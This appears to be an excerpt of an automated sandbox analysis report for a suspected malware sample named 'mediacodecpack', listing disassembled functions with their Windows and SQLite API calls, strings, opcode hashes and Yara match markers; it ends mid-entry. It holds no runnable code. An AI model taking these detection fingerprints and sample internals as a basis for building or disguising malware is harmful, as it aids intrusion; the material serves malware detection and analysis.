                                                                                • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_aggregate_context
                                                                                • String ID:
                                                                                • API String ID: 4225432645-0
                                                                                • Opcode ID: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
                                                                                • Instruction ID: 24a20a1669ecabf1c8c9e0f75de4e20f6480f0c3e20d7f4799920e66bb4c3c2a
                                                                                • Opcode Fuzzy Hash: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
                                                                                • Instruction Fuzzy Hash: 3F21CF71B086588FDB009F29C48075E7BE7AFA4254F0484A8E894CF305EB34DC86CB91
                                                                                APIs
                                                                                • _malloc.LIBCMT ref: 02D1E8B0
                                                                                  • Part of subcall function 02D11FBC: __FF_MSGBANNER.LIBCMT ref: 02D11FD3
                                                                                  • Part of subcall function 02D11FBC: __NMSG_WRITE.LIBCMT ref: 02D11FDA
                                                                                  • Part of subcall function 02D11FBC: RtlAllocateHeap.NTDLL(009D0000,00000000,00000001), ref: 02D11FFF
                                                                                • _free.LIBCMT ref: 02D1E8C3
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap_free_malloc
                                                                                • String ID:
                                                                                • API String ID: 1020059152-0
                                                                                • Opcode ID: f4691c13d370b132a11f7473a25ea9a7f7ca16d64019a3547af858ac957d9d04
                                                                                • Instruction ID: 4652657ff3291c7509e13dae592a6d5144bcf99d4700eaf0d50a5eeade6fd690
                                                                                • Opcode Fuzzy Hash: f4691c13d370b132a11f7473a25ea9a7f7ca16d64019a3547af858ac957d9d04
                                                                                • Instruction Fuzzy Hash: 5111A072908611BACF612F70B804B9A379AEF04374F114A25FE49DAF90DB34CD50DAE8
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D021DA
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D021ED
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 02D02224
                                                                                • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 02D02237
                                                                                • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02D02261
                                                                                  • Part of subcall function 02D02341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D02350
                                                                                  • Part of subcall function 02D02341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D02360
                                                                                  • Part of subcall function 02D02341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D02370
                                                                                  • Part of subcall function 02D02341: GetLastError.KERNEL32 ref: 02D0237A
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                • String ID:
                                                                                • API String ID: 1856819132-0
                                                                                • Opcode ID: 49b349074dcfeb47027e44677928acb775e9eff1b20fae0168bafbae323df864
                                                                                • Instruction ID: 3a15b3662d15217778382da71cdd9077b0b1aef62f705d3bfe99d675cc4a0d26
                                                                                • Opcode Fuzzy Hash: 49b349074dcfeb47027e44677928acb775e9eff1b20fae0168bafbae323df864
                                                                                • Instruction Fuzzy Hash: 8511AF71D01118EBCB159FA4E94CBAEBBBAFF58310F10851AEC55A23A0DB318E51CB90
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D0229D
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D022B0
                                                                                • TlsGetValue.KERNEL32 ref: 02D022E7
                                                                                • TlsSetValue.KERNEL32(?), ref: 02D02300
                                                                                • TlsSetValue.KERNEL32(?,?,?), ref: 02D0231C
                                                                                  • Part of subcall function 02D02341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D02350
                                                                                  • Part of subcall function 02D02341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D02360
                                                                                  • Part of subcall function 02D02341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D02370
                                                                                  • Part of subcall function 02D02341: GetLastError.KERNEL32 ref: 02D0237A
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                • String ID:
                                                                                • API String ID: 1856819132-0
                                                                                • Opcode ID: 104354ae85df520e753e5a157d59bf60ab8ae4c8976e3a6d9f5e341a85a8254c
                                                                                • Instruction ID: ae67a1d503a73213ec838c55656a44f53a12a438852240147aec121287b6cb3c
                                                                                • Opcode Fuzzy Hash: 104354ae85df520e753e5a157d59bf60ab8ae4c8976e3a6d9f5e341a85a8254c
                                                                                • Instruction Fuzzy Hash: 17115E71D01118EBCB159FA5E848AAEBBBAFF58310F10851AEC04A3760DB714D65DFA0
                                                                                APIs
                                                                                  • Part of subcall function 02D0A169: __EH_prolog.LIBCMT ref: 02D0A16E
                                                                                • __CxxThrowException@8.LIBCMT ref: 02D0AD33
                                                                                  • Part of subcall function 02D131CA: RaiseException.KERNEL32(?,?,02D0EB63,?,?,?,?,?,?,?,02D0EB63,?,02D2ECA8,?), ref: 02D1321F
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,02D2FA1C,?,00000001), ref: 02D0AD49
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 02D0AD5C
                                                                                • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,02D2FA1C,?,00000001), ref: 02D0AD6C
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D0AD7A
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
                                                                                • String ID:
                                                                                • API String ID: 2725315915-0
                                                                                • Opcode ID: 43e5fa743877a6efe05c2dd80ba0284775008764a9538acecbbcc2d1c201025b
                                                                                • Instruction ID: 7c69e4aac91e9b391e8f3a72fe93f94bc06e8ac39a9f500ee97bd29ea813fd09
                                                                                • Opcode Fuzzy Hash: 43e5fa743877a6efe05c2dd80ba0284775008764a9538acecbbcc2d1c201025b
                                                                                • Instruction Fuzzy Hash: 5101D1B2A00304AFDB149BA4ECC9F8A77ACEB04365B504814F611D63A0EB60EC08CB60
                                                                                APIs
                                                                                • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D02432
                                                                                • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02D02445
                                                                                • RtlEnterCriticalSection.NTDLL(?), ref: 02D02454
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 02D02469
                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 02D02470
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
                                                                                • String ID:
                                                                                • API String ID: 747265849-0
                                                                                • Opcode ID: c220d22f52e970a691ab14d239dd3c69ceee11cd0eaf9824cbb5bb5c36cc5f02
                                                                                • Instruction ID: 4c782c54a268e7693621a6a526583f239b78fd026c5fb49e6cd7c50baca1e066
                                                                                • Opcode Fuzzy Hash: c220d22f52e970a691ab14d239dd3c69ceee11cd0eaf9824cbb5bb5c36cc5f02
                                                                                • Instruction Fuzzy Hash: 87F04972641204BBD6249AA0EE8DFE6B72CFB14711F904411F701D6280D761E928CAE4
                                                                                APIs
                                                                                • InterlockedIncrement.KERNEL32(?), ref: 02D01ED2
                                                                                • PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 02D01EEA
                                                                                • RtlEnterCriticalSection.NTDLL(?), ref: 02D01EF9
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 02D01F0E
                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 02D01F15
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
                                                                                • String ID:
                                                                                • API String ID: 830998967-0
                                                                                • Opcode ID: 9f434ad9029a0737e7260175841ad9b83b19fb78aec652a1177bcce5143b8c12
                                                                                • Instruction ID: a6f3aae5975f58be763aa01e900bf31eca5d121e20247b57bf2041711bfe302f
                                                                                • Opcode Fuzzy Hash: 9f434ad9029a0737e7260175841ad9b83b19fb78aec652a1177bcce5143b8c12
                                                                                • Instruction Fuzzy Hash: E6F06772640604BBD714AFA0FE88FD6BB6CFF28711F900412F20186680D761E968CBE0
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_log
                                                                                • String ID: ($string or blob too big$|
                                                                                • API String ID: 632333372-2398534278
                                                                                • Opcode ID: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
                                                                                • Instruction ID: 3c3a64a58f66130c0c9aec06ea77be0954bd7b4098f3428da06b6372deec6608
                                                                                • Opcode Fuzzy Hash: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
                                                                                • Instruction Fuzzy Hash: 5DC10CB5A043288FCB66CF28C981789B7BABB59304F1085D9E958A7345C775EF81CF40
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _memmove
                                                                                • String ID: invalid string position$string too long
                                                                                • API String ID: 4104443479-4289949731
                                                                                • Opcode ID: 9e29c566c89c6c3bd0ae19069c205bc2b93b109c93f10716ec42196baf01d8be
                                                                                • Instruction ID: 3b836418e2fcb3b1c72ba5e18804b5dded88a215f478287914c7254a32e19558
                                                                                • Opcode Fuzzy Hash: 9e29c566c89c6c3bd0ae19069c205bc2b93b109c93f10716ec42196baf01d8be
                                                                                • Instruction Fuzzy Hash: 1E418231700304ABE7349E69D8C4B6AF7AAEB81754B10492DE856CB7E1C770FC05CBA5
                                                                                APIs
                                                                                • WSASetLastError.WS2_32(00000000), ref: 02D030C3
                                                                                • WSAStringToAddressA.WS2_32(?,?,00000000,?,?), ref: 02D03102
                                                                                • _memcmp.LIBCMT ref: 02D03141
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressErrorLastString_memcmp
                                                                                • String ID: 255.255.255.255
                                                                                • API String ID: 1618111833-2422070025
                                                                                • Opcode ID: 900c88ef90237997ec1ef7e9efc453060f9a62319f6a862df1cca8b7093165cd
                                                                                • Instruction ID: 76fb3671526b33db02796c21bb12f4d9d321b11f90d2aac748424a5b1f31d81f
                                                                                • Opcode Fuzzy Hash: 900c88ef90237997ec1ef7e9efc453060f9a62319f6a862df1cca8b7093165cd
                                                                                • Instruction Fuzzy Hash: 6431E1719003049FDB70AF64C8C0B6EB7A6EF49314F2085A9E8659B3E0DB719C41CF91
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$Protect$Query
                                                                                • String ID: @
                                                                                • API String ID: 3618607426-2766056989
                                                                                • Opcode ID: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
                                                                                • Instruction ID: 11fd3fd6c91f2e29dbdaed7331fdf7a08ef8f1da01c53322037319a40d79a89e
                                                                                • Opcode Fuzzy Hash: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
                                                                                • Instruction Fuzzy Hash: 003141B5E15208AFEB14DFA9D48158EFFF5EF99254F10852AE868E3310E371D940CB52
                                                                                APIs
                                                                                • sqlite3_malloc.SQLITE3 ref: 60928353
                                                                                  • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                                                • sqlite3_realloc.SQLITE3 ref: 609283A0
                                                                                • sqlite3_free.SQLITE3 ref: 609283B6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_realloc
                                                                                • String ID: d
                                                                                • API String ID: 211589378-2564639436
                                                                                • Opcode ID: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
                                                                                • Instruction ID: 0830c2115c9ea807631a831f7f1165b0ee40d8a8a94356aa67113494a68d5982
                                                                                • Opcode Fuzzy Hash: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
                                                                                • Instruction Fuzzy Hash: 222137B0A04205CFDB14DF59D4C078ABBF6FF69314F158469D8889B309E3B8E841CBA1
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D01F5B
                                                                                • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 02D01FC5
                                                                                • GetLastError.KERNEL32(?,00000000), ref: 02D01FD2
                                                                                  • Part of subcall function 02D01712: __EH_prolog.LIBCMT ref: 02D01717
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$CompletionCreateErrorLastPort
                                                                                • String ID: iocp
                                                                                • API String ID: 998023749-976528080
                                                                                • Opcode ID: 284406cfe59b189eaf80888e0015bc694c0cd2050e9f61da1bc548c94c06baa0
                                                                                • Instruction ID: e5e46ec4a632056f8a35d87816d9e2d5e6eb4902bea5f01ac83d6a7df726531f
                                                                                • Opcode Fuzzy Hash: 284406cfe59b189eaf80888e0015bc694c0cd2050e9f61da1bc548c94c06baa0
                                                                                • Instruction Fuzzy Hash: 3521C6B1801B449FC720DF6A954455AFBF8FFA4720B108A5FA4A683BA0D7B0A9048F91
                                                                                APIs
                                                                                • _malloc.LIBCMT ref: 02D127DD
                                                                                  • Part of subcall function 02D11FBC: __FF_MSGBANNER.LIBCMT ref: 02D11FD3
                                                                                  • Part of subcall function 02D11FBC: __NMSG_WRITE.LIBCMT ref: 02D11FDA
                                                                                  • Part of subcall function 02D11FBC: RtlAllocateHeap.NTDLL(009D0000,00000000,00000001), ref: 02D11FFF
                                                                                • std::exception::exception.LIBCMT ref: 02D127FB
                                                                                • __CxxThrowException@8.LIBCMT ref: 02D12810
                                                                                  • Part of subcall function 02D131CA: RaiseException.KERNEL32(?,?,02D0EB63,?,?,?,?,?,?,?,02D0EB63,?,02D2ECA8,?), ref: 02D1321F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                • String ID: bad allocation
                                                                                • API String ID: 3074076210-2104205924
                                                                                • Opcode ID: 8b5de095ca79cfc8054fb6e67e5a3179bb7c7f6d4934b3bc84a64c5f0996b0f7
                                                                                • Instruction ID: b9098b180aff7b141608283d9fb0de2b6dbd2c9fd7eb1d139445a43d3028772b
                                                                                • Opcode Fuzzy Hash: 8b5de095ca79cfc8054fb6e67e5a3179bb7c7f6d4934b3bc84a64c5f0996b0f7
                                                                                • Instruction Fuzzy Hash: BBE0A03450021EB6DB01BAA4FD049AF777DEF00304F000595AC1462F90EB31DE48D9E1
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D037B6
                                                                                • __localtime64.LIBCMT ref: 02D037C1
                                                                                  • Part of subcall function 02D11610: __gmtime64_s.LIBCMT ref: 02D11623
                                                                                • std::exception::exception.LIBCMT ref: 02D037D9
                                                                                  • Part of subcall function 02D114E3: std::exception::_Copy_str.LIBCMT ref: 02D114FC
                                                                                  • Part of subcall function 02D0952C: __EH_prolog.LIBCMT ref: 02D09531
                                                                                  • Part of subcall function 02D0952C: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02D09540
                                                                                  • Part of subcall function 02D0952C: __CxxThrowException@8.LIBCMT ref: 02D0955F
                                                                                Strings
                                                                                • could not convert calendar time to UTC time, xrefs: 02D037CE
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
                                                                                • String ID: could not convert calendar time to UTC time
                                                                                • API String ID: 1963798777-2088861013
                                                                                • Opcode ID: a46471f1d102cd230178fe64c35be9252090127a597f771192bfbb811b41efaf
                                                                                • Instruction ID: ab38cb4ff24c7efd308fe2081c76b66f4c4303a7025c90c262615f136f514db1
                                                                                • Opcode Fuzzy Hash: a46471f1d102cd230178fe64c35be9252090127a597f771192bfbb811b41efaf
                                                                                • Instruction Fuzzy Hash: BDE065B1D041199ACF00EFD4D5457EEB779FF50304F004595D82562751DB399E19CE90
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: _Jv_RegisterClasses$libgcj-11.dll
                                                                                • API String ID: 1646373207-2713375476
                                                                                • Opcode ID: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                                                • Instruction ID: e6822cb61b404b68644b44a252d8259deade1a358cfa59fcc717d95409d4d83a
                                                                                • Opcode Fuzzy Hash: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                                                • Instruction Fuzzy Hash: 0DE04F7062D30586FB443F794D923297AEB5F72549F00081CD9929B240EBB4D440D753
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(KERNEL32,004028E9), ref: 00402CCF
                                                                                • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00402CDF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                • API String ID: 1646373207-3105848591
                                                                                • Opcode ID: d54598a83eb0baa68b6903309d995a9c08ead6f1cb52c8cdd87b98e358e571e4
                                                                                • Instruction ID: 2adebd830dd3b14d64e79f2d4f5eff8f6aaaa0a0dfbfbc424d90c26f206a1370
                                                                                • Opcode Fuzzy Hash: d54598a83eb0baa68b6903309d995a9c08ead6f1cb52c8cdd87b98e358e571e4
                                                                                • Instruction Fuzzy Hash: 8EC01220388602ABFE902BB14F0EB2A21082F00B82F14407E6589F02C0CEBCC008903D
                                                                                APIs
                                                                                • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,00403BAA), ref: 004047AD
                                                                                • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,00403BAA), ref: 004047D1
                                                                                • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,00403BAA), ref: 004047EB
                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,00403BAA), ref: 004048AC
                                                                                • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,00403BAA), ref: 004048C3
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual$FreeHeap
                                                                                • String ID:
                                                                                • API String ID: 714016831-0
                                                                                • Opcode ID: 40c1f36ec91e0fdcd34999e659656618bdbc287b61182469df63e7afeec0b04d
                                                                                • Instruction ID: c10c021e120759eda6135e36457b27e0c23e5a43da849e4fe0a9db16ba58ca85
                                                                                • Opcode Fuzzy Hash: 40c1f36ec91e0fdcd34999e659656618bdbc287b61182469df63e7afeec0b04d
                                                                                • Instruction Fuzzy Hash: 453142B65007029BD3309F24DD40B26B7E0EB88B54F10CA3AEA95B76D1E778A8448F4C
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AdjustPointer_memmove
                                                                                • String ID:
                                                                                • API String ID: 1721217611-0
                                                                                • Opcode ID: ab1fdc08ba0f9b0001b3f4f22e608cec640e25dba6b7910461b295f0058b30ce
                                                                                • Instruction ID: 32cdfa474e67945e73bc497a507898e121205748a0b794f69d8ef4d3867fea43
                                                                                • Opcode Fuzzy Hash: ab1fdc08ba0f9b0001b3f4f22e608cec640e25dba6b7910461b295f0058b30ce
                                                                                • Instruction Fuzzy Hash: D341B035645342BEEB289F25F970BE633E5EF10764F24401DE89586FD1EB62ED80CA21
                                                                                APIs
                                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02D04149), ref: 02D103CF
                                                                                  • Part of subcall function 02D03FDC: __EH_prolog.LIBCMT ref: 02D03FE1
                                                                                  • Part of subcall function 02D03FDC: CreateEventA.KERNEL32(00000000,?,?,00000000), ref: 02D03FF3
                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D103C4
                                                                                • CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,02D04149), ref: 02D10410
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02D04149), ref: 02D104E1
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle$Event$CreateH_prolog
                                                                                • String ID:
                                                                                • API String ID: 2825413587-0
                                                                                • Opcode ID: 91e8563b43ae2d15d1feb3a9b116cb32d989de69c7bec14d8bd95ad115b44514
                                                                                • Instruction ID: 96c23505da20e68cea99f1c70b1901b2ae9ce6b1bfedff0dafd367ec3a52e43e
                                                                                • Opcode Fuzzy Hash: 91e8563b43ae2d15d1feb3a9b116cb32d989de69c7bec14d8bd95ad115b44514
                                                                                • Instruction Fuzzy Hash: 9551E171604309ABDB20EF28E884B5A77E4FF48329F154618FCA997780D735DC85CB91
                                                                                APIs
                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02D1E2EC
                                                                                • __isleadbyte_l.LIBCMT ref: 02D1E31A
                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,00000000,00000000,?,?,?), ref: 02D1E348
